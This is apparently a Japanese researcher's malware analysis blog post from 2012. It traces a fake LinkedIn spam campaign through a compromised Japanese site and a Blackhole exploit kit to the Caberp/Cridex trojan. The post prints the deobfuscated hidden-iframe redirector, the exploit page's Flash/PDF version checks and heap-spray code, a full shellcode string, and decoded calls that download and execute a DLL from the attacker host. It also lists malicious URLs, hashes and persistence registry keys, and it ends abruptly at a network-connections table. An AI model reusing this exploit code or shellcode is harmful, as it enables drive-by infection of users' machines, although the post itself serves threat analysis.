#OCJP-038：偽者LINKEDINメールのマルウェア感染ページが日本国内IDC(Sakura)サーバに発見！Blackhole経由の最新版Caberp(Cridex/Dapato)トロイの感染仕組みが日本迄に来ました。 【対応最中】

昨日からニセLINKEDINからスパムが沢山届きました。LINKEDINネットワークに登録して無い方々にも本件のスパムメールが届きました。本件の感染事件はニセLINKEDINスパムのリンクからのマルウェア感染仕組みです。具体的な流れは、K-SHIELDメールフィルターアプライアンス製品でブロックされたサンプルを調査したら日本で本マルウェアに感染されたサーバが見つかりました。マルウェア情報ですが、Caberp(Cridex/Dapato)です。感染されたサーバの原因は前回#OCJPのレポートと同じでサイトのウェブ脆弱性です。
さて、詳細情報は下記となります↓

■感染されたドメイン・サーバ↓
nexe-japan.com / 59.106.157.194
■感染されたURL↓
hxxp://nexe-japan.com/link.html
■ダウンロード証拠↓
Thu Apr 12 22:17:09 JST 2012
--19:29:48--  hxxp://nexe-japan.com/link.html
           => `link.html'
Resolving nexe-japan.com... 59.106.157.194
Connecting to nexe-japan.com|59.106.157.194|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,984 (2.9K) [text/html]
100%[===================================> ] 2,984         --.--K/s
19:29:48 (87.06 MB/s) - `link.html' saved [2984/2984]

追加ヘッタ情報↓
  Date: Thu, 12 Apr 2012 15:03:22 GMT
  Server: Apache
  Last-Modified: Wed, 11 Apr 2012 17:00:00 GMT
  ETag: "cd914c0-ba8-2b734400"

※形的にはそのままでHTMLテキストファイルです。
■ウイルススキャン結果↓
File name:       link.html
MD5:             f8331221d6a1651a1029b625bb4bd7fe
File size:       2.9 KB ( 2984 bytes )
File type:       HTML
Detection ratio: 7 / 41
Analysis date:   2012-04-12 12:26:44 UTC
Result:          [CLICK]
■どんな物でしょうか？マルウェア種類
アファイル　　：「○○.html」
マルウェア種類： Blackhole Exploit pack感染ファイル(Redirector)
マルウェア名　： HTML/JS/Trojan Agent又はRedirector 
マルウェア機能： マルウェアファイルをダウンロードされます
説明　　　　　： アクセスされたら、マルウェアがダウンロードされてしまいます。
                 マルウェアダウンローダサイトをアクセスされてしまいます。
■何処に発見しましたか？
下記のスパムメール（テキスト経由）に本件のURLを発見しました↓

※個人情報が入ったサンプルでしたので、色々フィルターしました↑

別のサンプルで（HTMLメール経由）見れば見た目はこんな感じです↓

↑【注意】上記のURLをクリックするとマルウェアが直ぐにダウンロードしてしまいます。
          似たようなメールが届いたら直ぐに削除して下さい。
■マルウェア調査↓
チェーンが長いから短くにしますね、下記の流れとなります↓

hxxp://nexe-japan.com/link.htmlの中身を見たら、obfuscated javascriptコードを発見しました↓

↑コードが長いので、右側でカットしました、ごめんね。
実行されたらこんな感じになります↓
解けたら下記の結果が分かります↓
if (document.getElementsByTagName('body')[0]){iframer();} else {document.write
("＜iframe src='hxxp://baiparz.com/main.php?page=f93de12c807d28df' width='10' 
height='10' style='visibility:hidden;position:absolute;left:0;top:0;'＞
＜/iframe＞");}function iframer(){var f = document.createElement('iframe');
f.setAttribute('src','hxxp://baiparz.com/main.php?page=f93de12c807d28df');
f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';
f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);}  
↑コードを見たらIFRAMEが出ると分かったので、上記のURLにアクセスが飛んでますね。

さくっとダウンロードして見れば↓
--19:48:07--  hxxp://baiparz.com/main.php?page=f93de12c807d28df
           => `main.php@page=f93de12c807d28df'
Resolving baiparz.com... 85.189.11.134, 41.64.21.71
Connecting to baiparz.com|85.189.11.134|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
    [   <=>                               ] 20,183        33.92K/s
19:48:09 (33.87 KB/s) - `main.php@page=f93de12c807d28df' saved [20183]
このファイルはマルウェアですか？どんな物ですか？
⇒このファイルはマルウェアダウンローダーです。
Blackhole exploit Pack経由から感染されたファイルです。
このファイルをクリックしたらshellcodeが出てマルウェアをダウンロードしてしまう。
下記ウイルススキャン結果↓
File name:       main.php@page=f93de12c807d28df
MD5:             85bee83e33d27fa21d15b37fabefe82e
File size:       19.7 KB ( 20183 bytes )
File type:       HTML
Detection ratio: 0 / 42
Analysis date:   2012-04-12 12:12:35 UTC
Result:          [CLICK]
↑何故検知率はゼロですかね？
最近でた物ですので、それで結構複雑なコードが書いてあります。
現在ウイルススキャンをすると結果はゼロだと可笑しくないです。
ウイルス対策メーカーに本サンプルを送らないと検知率が出ないと思います。
マルウェア作った方々がよーくウイルス対策ソフトの限界が分かると思います。
続いて、中身を見たら↓

↑また複雑なJavascriptですね、解けようと思って、1回目は失敗しました↓
3回目迄で色んな方法をやれば解けたので、結果は下記となります↓
document.wr00te('＜center＞＜h1＞Please wait page is loading...＜/h1＞＜/center＞＜hr＞');
function end_redirect（）{
}
try {
  var PluginDetect = {
    version : "0.7.6", name : "PluginDetect", handler : function (c, b, a){
      return function （）{
        c(b, a)
      }
    }
    , isDefined : function (b){
      return typeof b != "undefined"
    }
    , isArray : function (b){
      return (/array/i).test(Object.prototype.toString.call(b))
    }
    , isFunc : function (b){
      return typeof b ＝＝ "function"
    }
    , isString : function (b){
      return typeof b ＝＝ "string"
    }
    , isNum : function (b){
      return typeof b ＝＝ "number"
    }
    , isStrNum : function (b){
      return (typeof b ＝＝ "string" && (/￥d/).test(b))
    }
    , getNumRegx :/ [ ￥ d][ ￥ d ￥ . ￥ _ ,- ] */, splitNumRegx :/ [ ￥ . ￥ _ ,- ]
/g,getNum:function(b,c){var d=this,a=d.isStrNum(b)?(d.isDefined(c)?new RegExp(c):d.getNumR
egx).exec(b):null;return a?a[0]:null},compareNums:function(h,f,d){var e=this,c,b,a,g=parse
Int;if(e.isStrNum(h)&&e.isStrNum(f)){if(e.isDefined(d)&&d.compareNums){return d.compareNum
s(h,f)}c=h.split(e.splitNumRegx);b=f.split(e.splitNumRegx);for(a=0;a＜Math.min(c.length,b.l
ength);a++){if(g(c[a],10)＞g(b[a],10)){return 1}if(g(c[a],10)＜g(b[a],10)){return -1}}}retur
n 0},formatNum:function(b,c){var d=this,a,e;if(!d.isStrNum(b)){return null}if(!d.isNum(c))
{c=4}c--;e=b.replace(/ ￥ s
    /g,"").split(d.splitNumRegx).concat(["0","0","0","0"]);for(a=0;a＜4;a++){if(/ ^ (0 + 
    )(. + )$/.test(e[a])){e[a]=RegExp.$2}if(a＞c||!(/ ￥ d
/).test(e[a])){e[a]="0"}}return e.slice(0,4).join(",")},$$hasMimeType:function(a){return f
unction(d){if(!a.isIE&&d){var c,b,e,f=a.isString(d)?[d]:d;if(!f||!f.length){return null}fo
r(e=0;e＜f.length;e++){if(/[ ^￥ s]
/.test(f[e])&&(c=navigator.mimeTypes[f[e]])&&(b=c.enabledPlugin)&&(b.name||b.description))
{return c}}}return null}},findNavPlugin:function(l,e,c){var j=this,h=new RegExp(l,"i"),d=(
!j.isDefined(e)||e)?/ ￥ d
/:0,k=c?new RegExp(c,"i"):0,a=navigator.plugins,g="",f,b,m;for(f=0;f＜a.length;f++){m=a[f].
description||g;b=a[f].name||g;if((h.test(m)&&(!d||d.test(RegExp.leftContext+RegExp.rightCo
ntext)))||(h.test(b)&&(!d||d.test(RegExp.leftContext+RegExp.rightContext)))){if(!k||!(k.te
st(m)||k.test(b))){return a[f]}}}return null},getMimeEnabledPlugin:function(k,m,c){var e=t
his,f,b=new RegExp(m,"i"),h="",g=c?new RegExp(c,"i"):0,a,l,d,j=e.isString(k)?[k]:k;for(d=0
;d＜j.length;d++){if((f=e.hasMimeType(j[d]))&&(f=f.enabledPlugin)){l=f.description||h;a=f.n
ame||h;if(b.test(l)||b.test(a)){if(!g||!(g.test(l)||g.test(a))){return f}}}}return 0},getP
luginFileVersion:function(f,b){var h=this,e,d,g,a,c=-1;if(h.OS＞2||!f||!f.version||!(e=h.ge
tNum(f.version))){return b}if(!b){return e}e=h.formatNum(e);b=h.formatNum(b);d=b.split(h.s
plitNumRegx);g=e.split(h.splitNumRegx);for(a=0;a＜d.length;a++){if(c＞-1&&a＞c&&!(d[a]＝＝"0"))
{return b}if(g[a]!=d[a]){if(c＝＝-1){c=a}if(d[a]!="0"){return b}}}return e},AXO:window.Activ
eXObject,getAXO:function(a){var f=null,d,b=this,c={};try{f=new b.AXO(a)}catch(d){}return f
},convertFuncs:function(g){var a,h,f,b=/ ^ [ ￥ $][ ￥ $]
/,d={},c=this;for(a in g){if(b.test(a)){d[a]=1}}for(a in d){try{h=a.slice(2);if(h.length＞0
&&!g[h]){g[h]=g[a](g);delete g[a]}}catch(f){}}},initScript:function（）{var c=this,a=navigat
or,e="/",i=a.userAgent||"",g=a.vendor||"",b=a.platform||"",h=a.product||"
    ";if(c.file){c.file.$=c}if(c.verify){c.verify.$=c};c.OS=100;if(b){var f,d=["Win",1,"
    Mac",2,"Linux",3,"FreeBSD",4,"iPhone",21.1,"iPod",21.2,"iPad",21.3,"Win. * "+"CE
    ",22.1,"Win. * Mobile",22.2,"Pocket ￥￥ s * PC",22.3,"
    ",100];for(f=d.length-2;f＞=0;f=f-2){if(d[f]&&new RegExp(d[f],"i
    ").test(b)){c.OS=d[f+1];break}}}c.convertFuncs(c);c.isIE=new Function("return "+e+" * 
    @cc"+"_on!@ * "+e+"false"
)（）;c.verIE=c.isIE&&(/MSIE￥s*(￥d+￥.?￥d*)/i).test(i)?parseFloat(RegExp.$1,10):null;c.Active
XEnabled=false;if(c.isIE){var f,j=["Msxml2.XMLHTTP","Msxml2.DOMDocument","Microsoft.XMLDOM
    ","ShockwaveFlash.ShockwaveFlash","TDCCtl.TDCCtl","Shell.UIHelper","Scripting.
    Dictionary","wmplayer.ocx"
];for(f=0;f＜j.length;f++){if(c.getAXO(j[f])){c.ActiveXEnabled=true;break}}c.head=c.isDefin
ed(document.getElementsByTagName)?document.getElementsByTagName("head"
)[0]:null}c.isGecko=(/Gecko/i).test(h)&&(/ecko￥s*￥/￥s*￥d/i).test(i);c.verGecko=c.isGecko?c
.formatNum((/rv￥s*￥:￥s*([￥.￥,￥d]+)/i).test(i)?RegExp.$1:"0.9"
):null;c.isSafari=(/Safari￥s*￥/￥s*￥d/i).test(i)&&(/Apple/i).test(g);c.isChrome=(/Chrome￥s*
￥/￥s*(￥d[￥d￥.]*)/i).test(i);c.verChrome=c.isChrome?c.formatNum(RegExp.$1):null;c.isOpera=(
/Opera￥s*[￥/]?￥s*(￥d+￥.?￥d*)/i).test(i);c.verOpera=c.isOpera&&((/Version￥s*￥/￥s*(￥d+￥.?￥d*
)/i).test(i)||1)?parseFloat(RegExp.$1,10):null;c.addWinEvent("load"
,c.handler(c.runWLfuncs,c))},init:function(c){var b=this,a,c;if(!b.isString(c)){return -3}
if(c.length＝＝1){b.getVersionDelimiter=c;return -3}c=c.toLowerCase（）.replace(/￥s/g,""
);a=b[c];if(!a||!a.getVersion){return -3}b.plugin=a;if(!b.isDefined(a.installed)){a.instal
led=a.version=a.version0=a.getVersionDone=null;a.$=b;a.pluginName=c}b.garbage=false;if(b.i
sIE&&!b.ActiveXEnabled){if(a!＝＝b.java){return -2}}return 1},fPush:function(b,a){var c=this
;if(c.isArray(a)&&(c.isFunc(b)||(c.isArray(b)&&!(b.length＜=0)&&c.isFunc(b[0])))){a.push(b)
}},callArray:function(b){var c=this,a;if(c.isArray(b)){for(a=0;a＜b.length;a++){if(b[a]＝＝=n
ull){return}c.call(b[a]);b[a]=null}}},call:function(c){var b=this,a=b.isArray(c)?c.length:
-1;if(!(a＜=0)&&b.isFunc(c[0])){c[0](b,a＞1?c[1]:0,a＞2?c[2]:0,a＞3?c[3]:0)}else{if(b.isFunc(c
)){c(b)}}},getVersionDelimiter:", "
,$$getVersion:function(a){return function(g,d,c){var e=a.init(g),f,b,h={};if(e＜0){return n
ull};f=a.plugin;if(f.getVersionDone!=1){f.getVersion(null,d,c);if(f.getVersionDone＝＝=null)
{f.getVersionDone=1}}a.cleanup（）;b=(f.version||f.version0);b=b?b.replace(a.splitNumRegx,a.
getVersionDelimiter):b;return b}},cleanup:function（）{},addWinEvent:function(d,c){var e=thi
s,a=window,b;if(e.isFunc(c)){if(a.addEventListener){a.addEventListener(d,c,false)}else{if(
a.attachEvent){a.attachEvent("on"+d,c)}else{b=a["on"+d];a["on
    "+d]=e.winHandler(c,b)}}}},winHandler:function(d,c){return function（）{d（）;if(typeof c＝＝"
    function "
){c（）}}},WLfuncs0:[],WLfuncs:[],runWLfuncs:function(a){var b={};a.winLoaded=true;a.callArr
ay(a.WLfuncs0);a.callArray(a.WLfuncs);if(a.onDoneEmptyDiv){a.onDoneEmptyDiv（）}},winLoaded:
false,$$onWindowLoaded:function(a){return function(b){if(a.winLoaded){a.call(b)}else{a.fPu
sh(b,a.WLfuncs)}}},div:null,divID:"plugindetect"
,divWidth:50,pluginSize:1,emptyDiv:function（）{var d=this,b,h,c,a,f,g;if(d.div&&d.div.child
Nodes){for(b=d.div.childNodes.length-1;b＞=0;b--){c=d.div.childNodes[b];if(c&&c.childNodes)
{for(h=c.childNodes.length-1;h＞=0;h--){g=c.childNodes[h];try{c.removeChild(g)}catch(f){}}}
if(c){try{d.div.removeChild(c)}catch(f){}}}}if(!d.div){a=document.getElementById(d.divID);
if(a){d.div=a}}if(d.div&&d.div.parentNode){try{d.div.parentNode.removeChild(d.div)}catch(f
){}d.div=null}},DONEfuncs:[],onDoneEmptyDiv:function（）{var c=this,a,b;if(!c.winLoaded){ret
urn}if(c.WLfuncs&&c.WLfuncs.length&&c.WLfuncs[c.WLfuncs.length-1]!＝＝null){return}for(a in 
c){b=c[a];if(b&&b.funcs){if(b.OTF＝＝3){return}if(b.funcs.length&&b.funcs[b.funcs.length-1]!
＝＝null){return}}}for(a=0;a＜c.DONEfuncs.length;a++){c.callArray(c.DONEfuncs)}c.emptyDiv（）},
getWidth:function(c){if(c){var a=c.scrollWidth||c.offsetWidth,b=this;if(b.isNum(a)){return
 a}}return -1},getTagStatus:function(m,g,a,b){var c=this,f,k=m.span,l=c.getWidth(k),h=a.sp
an,j=c.getWidth(h),d=g.span,i=c.getWidth(d);if(!k||!h||!d||!c.getDOMobj(m)){return -2}if(j
＜i||l＜0||j＜0||i＜0||!(i＞c.pluginSize)||c.pluginSize＜1){return 0}if(l＞=i){return -1}try{if(l
＝＝c.pluginSize&&(!c.isIE||c.getDOMobj(m).readyState＝＝4)){if(!m.winLoaded&&c.winLoaded){ret
urn 1}if(m.winLoaded&&c.isNum(b)){if(!c.isNum(m.count)){m.count=b}if(b-m.count＞=10){return
 1}}}}catch(f){}return 0},getDOMobj:function(g,a){var f,d=this,c=g?g.span:0,b=c&&c.firstCh
ild?1:0;try{if(b&&a){c.firstChild.focus（）}}catch(f){}return b?c.firstChild:null},setStyle:
function(b,g){var f=b.style,a,d,c=this;if(f&&g){for(a=0;a＜g.length;a=a+2){try{f[g[a]]=g[a+
1]}catch(d){}}}},insertDivInBody:function(a,i){var h,f=this,b="pd33993399
    ",d=null,j=i?window.top.document:window.document,c=" ＜ ",g=(j.getElementsByTagName("
    body")[0]||j.body);if(!g){try{j.write(c+'div id="'+b+'"＞o'+c+"
/div＞");d=j.getElementById(b)}catch(h){}}g=(j.getElementsByTagName("body")[0]||j.body);if(
g){if(g.firstChild&&f.isDefined(g.insertBefore)){g.insertBefore(a,g.firstChild)}else{g.app
endChild(a)}if(d){g.removeChild(d)}}else{}},insertHTML:function(g,b,h,a,k){var l,m=documen
t,j=this,p,o=m.createElement("span"),n,i,f="＜";var c=["outlineStyle","none","borderStyle",
"none","padding","0px","margin","0px","visibility","visible"];if(!j.isDefined(a)){a=""}if(
j.isString(g)&&(/[ ^￥ s]
/).test(g)){p=f+g+' width="'+j.pluginSize+'" height="'+j.pluginSize+'" ';for(n=0;n＜b.lengt
h;n=n+2){if(/[ ^￥ s]
    /.test(b[n+1])){p+=b[n]+'="'+b[n+1]+'" '}}p+="＞";for(n=0;n＜h.length;n=n+2){if(/[ ^￥ s]
    /.test(h[n+1])){p+=f+'param name="'+h[n]+'" value="'+h[n+1]+'" / ＞ '
}}p+=a+f+"/"+g+"＞"}else{p=a}if(!j.div){i=m.getElementById(j.divID);if(i){j.div=i}else{j.di
v=m.createElement("div");j.div.id=j.divID;j.insertDivInBody(j.div)}j.setStyle(j.div,c.conc
at(["width",j.divWidth+"px","height",(j.pluginSize+3)+"px","fontSize",(j.pluginSize+3)+"px
","lineHeight",(j.pluginSize+3)+"px","verticalAlign","baseline","display","block"]));if(!i
){j.setStyle(j.div,["position","absolute","right","0px","top","0px"])}}if(j.div&&j.div.par
entNode){j.div.appendChild(o);j.setStyle(o,c.concat(["fontSize",(j.pluginSize+3)+"px","lin
eHeight",(j.pluginSize+3)+"px","verticalAlign","baseline","display","inline"]));try{if(o&&
o.parentNode){o.focus（）}}catch(l){}try{o.innerHTML=p}catch(l){}if(o.childNodes.length＝＝1&&
!(j.isGecko&&j.compareNums(j.verGecko,"1"+",5,0,0")＜0)){j.setStyle(o.firstChild,c.concat([
"display","inline"]))}return{span:o,winLoaded:j.winLoaded,tagName:(j.isString(g)?g:"")}}re
turn{span:null,winLoaded:j.winLoaded,tagName:""}},flash:{mimeType:"application/x-shockwave
-flash",progID:"ShockwaveFlash.ShockwaveFlash",classID:"clsid:D27CDB6E-AE6D-11CF-96B8-4445
53540000",getVersion:function（）{var b=function(i){if(!i){return null}var e=/[￥d][￥d￥,￥.￥s]
*[rRdD]{0,1}[￥d￥,]*/.exec(i);return e?e[0].replace(/[rRdD￥.]/g,",").replace(/￥s/g,""):null
};var j=this,g=j.$,k,h,l=null,c=null,a=null,f,m,d;if(!g.isIE){m=g.hasMimeType(j.mimeType);
if(m){f=g.getDOMobj(g.insertHTML("object",["type",j.mimeType],[],"",j));try{l=g.getNum(f.G
etVariable("$version"))}catch(k){}}if(!l){d=m?m.enabledPlugin:null;if(d&&d.description){l=
b(d.description)}if(l){l=g.getPluginFileVersion(d,l)}}}else{for(h=15;h＞2;h--){c=g.getAXO(j
.progID+"."+h);if(c){a=h.toString（）;break}}if(!c){c=g.getAXO(j.progID)}if(a＝＝"6"){try{c.Al
lowScriptAccess="always"}catch(k){return"6,0,21,0"}}try{l=b(c.GetVariable("$version"))}cat
ch(k){}if(!l&&a){l=a}}j.installed=l?1:-1;j.version=g.formatNum(l);return true}},adobereade
r:{mimeType:"application/pdf",navPluginObj:null,progID:["AcroPDF.PDF","PDF.PdfCtrl"],class
ID:"clsid:CA8A9780-280D-11CF-A24D-444553540000",INSTALLED:{},pluginHasMimeType:function(d,
c,f){var b=this,e=b.$,a;for(a in d){if(d[a]&&d[a].type&&d[a].type＝＝c){return 1}}if(e.getMi
meEnabledPlugin(c,f)){return 1}return 0},getVersion:function(l,j){var g=this,d=g.$,i,f,m,n
,b=null,h=null,k=g.mimeType,a,c;if(d.isString(j)){j=j.replace(/￥s/g,"");if(j){k=j}}else{j=
null}if(d.isDefined(g.INSTALLED[k])){g.installed=g.INSTALLED[k];return}if(!d.isIE){a="Adob
e.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";if(g.getVersionDone!＝＝0
){g.getVersionDone=0;b=d.getMimeEnabledPlugin(g.mimeType,a);if(!j){n=b}if(!b&&d.hasMimeTyp
e(g.mimeType)){b=d.findNavPlugin(a,0)}if(b){g.navPluginObj=b;h=d.getNum(b.description)||d.
getNum(b.name);h=d.getPluginFileVersion(b,h);if(!h&&d.OS＝＝1){if(g.pluginHasMimeType(b,"app
lication/vnd.adobe.pdfxml",a)){h="9"}else{if(g.pluginHasMimeType(b,"application/vnd.adobe.
x-mars",a)){h="8"}}}}}else{h=g.version}if(!d.isDefined(n)){n=d.getMimeEnabledPlugin(k,a)}g
.installed=n&&h?1:(n?0:(g.navPluginObj?-0.2:-1))}else{b=d.getAXO(g.progID[0])||d.getAXO(g.
progID[1]);c=/=￥s*([￥d￥.]+)/g;try{f=(b||d.getDOMobj(d.insertHTML("object",["classid",g.cla
ssID],["src",""],"",g))).GetVersions（）;for(m=0;m＜5;m++){if(c.test(f)&&(!h||!(RegExp.$1-h＜=
0))){h=RegExp.$1}}}catch(i){}g.installed=h?1:(b?0:-1)}if(!g.version){g.version=d.formatNum
(h)}g.INSTALLED[k]=g.installed}},zz:0};PluginDetect.initScript（）;PluginDetect.getVersion("
.");pdfver=PluginDetect.getVersion("AdobeReader");flashver=PluginDetect.getVersion('Flash
    ');}catch(e){}if(typeof pdfver＝＝'string'){pdfver=pdfver.split('.
    ')}else{pdfver=[0,0,0,0]}if(typeof flashver＝＝'string'){flashver=flashver.split('.'
)}else{flashver=[0,0,0,0]};exec7=1;function spl0（）{spl2（）}function spl2（）{spl3（）}function 
spl3（）{spl4（）}function spl4（）{spl5（）}function getCN（）{return 'data
/score.swf'}function getBlockSize（）{return 1024}function getAllocSize（）{return 1024 * 1024
}function getAllocCount（）{return 300}function getFillBytes（）{var a='%u'+'0c0c';return a+a;
}function getShellCode（）{if(1){return "%u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u5
9e9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua
324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2
e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1
bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua
376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7
bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u2
8c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4
740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2
829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u4
07b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6
cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u4
23e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u1
7a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua
2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u494a%u5841%u5a49%u0652%u474b%u0745%u0
65f%u4058%u1758%u154e%u1119%u1f11%u0e1d%u154d%u2819%u0028";}}function spl5（）{var ver1=flas
hver[0];var ver2=flashver[1];var ver3=flashver[2];if (((ver1＝＝10&&ver2＝＝0&&ver3＞40)||((ver
1＝＝10&&ver2＞0)&&(ver1＝＝10&&ver2＜2)))||((ver1＝＝10&&ver2＝＝2&&ver3＜159)||(ver1＝＝10&&ver2＜2)))
{var fname="data/field";var Flash_obj=" ＜ objectclassid = 
    'clsid:d27cdb6e-ae6d-11cf-96b8-444553540000'width = 10height = 10id = 'swf_id' ＞ 
    ";Flash_obj+=" ＜ paramname = 'movie'value = '"+fname+".swf'
    /＞";al="always";Flash_obj+="＜param name=￥"allowScriptAccess￥" value='"+al+"' / ＞ 
    ";Flash_obj+=" ＜ paramname = 'Play'value = '0'
/＞";Flash_obj+="＜embed src='"+fname+".swf' id='swf_id' name='swf_id'";Flash_obj+="allowScr
iptAccess='"+al+"'";Flash_obj+="type='application/x - shockwave - flash
    '";Flash_obj+="width='10' height='10' ＞ ";Flash_obj+=" ＜/ embed ＞ ";Flash_obj+=" ＜/ 
    object ＞ ";var oSpan=document.createElement("span");
    document.body.appendChild(oSpan);
    oSpan.innerHTML = Flash_obj;
  }
  setTimeout(end_redirect, 8000);
}
spl0（）;
↑上記の結果を実行したらSHELLCODEが出て来ました↓
上記のSHELLCODEがKERNEL.DLLとURLMON.DLLを使っているコードですので、
分析したら下記のコマンドが分かりました↓
0x7c801ad9 
 ⇒kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b 
 ⇒kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa 
 ⇒kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, 
   [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe 
 ⇒urlmon.URLDownloadToFileA(pCaller=0, 
   szURL=hxxp://baiparz.com/w.php?f=19975&e=1, lpfnCB=0x0, 
   szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll
0x7c86250d
 ⇒kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll,
   uCmdShow=0)
0x7c86250d 
 ⇒kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll,
   uCmdShow=0) 
0x7c81cb3b
 ⇒kernel32.TerminateThread(dwExitCode=0

↑簡単に言うと上記のURLファイルをダウンロードしパソコンのパスにwpbt0.dllで保存されて
そして実行＆レジストリー登録を行われていると。
では、ダウンロードしました↓
--19:47:01--  hxxp://baiparz.com/w.php?f=19975
           => `w.php@f=19975'
Resolving baiparz.com... 85.189.11.134, 41.64.21.71
Connecting to baiparz.com|85.189.11.134|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 198,656 (194K) [application/x-msdownload]
100%[====================================>] 198,656       78.80K/s
19:47:05 (78.70 KB/s) - `w.php@f=19975' saved [198656/198656]
スキャンをすると下記の結果となります↓
File name:       wpbt0.dll　/などなど
MD5:             ccaeca990f2c7c416b8aa03795abada1
File size:       194.0 KB ( 198656 bytes )
File type:       Win32 EXE
Detection ratio: 11 / 42
Analysis date:   2012-04-12 13:13:57 UTC
Result:          [CLICK]
どんな物でしょうか？これはCaberp(Cridex/Dapato)マルウェアです、種類の説明は↓
アファイル　　：「○○.exe」
マルウェア種類： Blackhole Exploit pack経由のCaberp(Cridex/Dapato)トロイ
マルウェア名　： Trojan/Win32.Caberp、Trojan.DownLoader、Cridex、Dapatoなどなど
マルウェア機能： スパイウェア、ダウンローダー、メモリ盗む、バックドア
説明　　　　　： 全てマルウェア機能情報書いた通り
本ZBotの調査結果は（私がVirusTotalに書いたように）↓
1. CRCの結果が間違っています  Claimed:  0 Actual:  225345
2. 偽者日付け 0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]SUSPICIOUS
3. マルウェアの関係DLLコール動き↓
   使っているDLLは⇒user32.dll、kernel32.dll、shlwapi.dll、advapi32.dll、wtsapi32.dll
   その中に下記のコールはマルウェア関係の動きです↓
   user32.dll.RegisterClipboardFormatW Hint[0]  //hook clipboard
   user32.dll.GetClipboardFormatNameA Hint[0]   //get clipboard
   kernel32.dll.GetCommandLineA Hint[0] //exec command 
   advapi32.dll.CreateServiceA Hint[0]  //create new process
   advapi32.dll.ControlService Hint[0]  //manipulate process
   advapi32.dll.SetTokenInformation Hint[0]  //privilege escallation
   wtsapi32.dll.WTSShutdownSystem Hint[0] // system shutdown
   wtsapi32.dll.WTSSendMessageW Hint[0]  //system messages
4. 読まれたRegistry情報とRUNTIME DLLを比較したら、下記はあやしい点↓
   C:\WINDOWS\system32\adsldpc.dll      0x76E10000     0x00025000
   C:\WINDOWS\system32\WLDAP32.dll      0x76F60000     0x0002C000
   LOAD REGISTRY:
   HKEY_CURRENT_USER\Software\Microsoft\Windows\Safer\CodeIdentifiers  TransparentEnabled
   HKEY_CURRENT_USER\System\CurrentControlSet\Control\Terminal Server  TSUserEnabled
   HKEY_CURRENT_USER\System\CurrentControlSet\Services\LDAP  LdapClientIntegrity
   なぜあやしいですか？↑よく見たら下記の疑問が出ました：
   4.1. 何故LDAPの確認がありますか？
        ⇒回答は：Caberpの特徴は色んなLOGIN情報を盗む事で、
　　　　　MSのADドメインのログイン情報盗む為にこの確認動きが出たかと思われます。
   4.2. Terminal Server Serviceの確認もあります、リモートアクセスをやる積もりかな？
　　　　⇒回答は：Terminalサービスのログイン情報を盗まれるかどうかの確認だと思われます。
5. 保存されたファイル↓
   %AppData%\FBDC89D4%\KB00441600.exe ccaeca990f2c7c416b8aa03795abada1 198,656 bytes
   %Temp%\POS1.tmp d41d8cd98f00b204e9800998ecf8427e 0 bytes
6. レジストリー変更↓
   HKEY_CURRENT_USER\Software\Microsoft\Windows Media Center
   HKEY_CURRENT_USER\Software\Microsoft\Windows Media Center\FB119394
   HKEY_CURRENT_USER\Software\Microsoft\Windows Media Center\FBDC89D4
   [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
     +→ KB00441600.exe = ""%AppData%\KB00441600.exe""
7. EXECECUTION FOREIGN MEMORY:
   CMD SHELL="%AppData%\FBDC89D4%\KB00441600.exe"
   MEMORY SNAPSHOT↓
   sample  198,656 bytes
   KB00441600.exe %AppData%\FBDC89D4%\KB00441600.exe 237,568 bytes
8. 下記のURLの接続動きを発見しました↓
   USES HTTP Connections w/AUTH
   domain                  PORT    USER                    PASSWORDS
